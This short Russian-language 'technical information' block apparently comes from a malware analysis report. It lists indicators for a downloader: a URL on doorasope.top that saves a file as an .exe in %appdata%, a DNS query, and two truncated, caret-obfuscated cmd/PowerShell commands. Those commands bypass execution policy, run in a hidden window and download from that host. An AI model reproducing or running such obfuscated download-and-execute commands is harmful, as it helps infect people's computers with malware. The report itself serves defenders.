Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWE^rS^hELL.ex^E -exEc^UT^IOnPO^Licy^ BYPASs -NOp^ROFI^LE -W^I^N^dOW^stY^lE^ HIdD^En (N^EW-o^B^jECt SyStem.NET.wE^B^c^lieN^T).D^oWN^LoaDFILE('http://www.doorasope.top/read....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "POWE^rS^hELL.ex^E -exEc^UT^IOnPO^Licy^ BYPASs -NOp^ROFI^LE -W^I^N^dOW^stY^lE^ HIdD^En (N^EW-o^B^jECt SyStem.NET.wE^B^c^lieN^T).D^oWN^LoaDFILE('http://www.doorasope.top/read....' (со скрытым окном)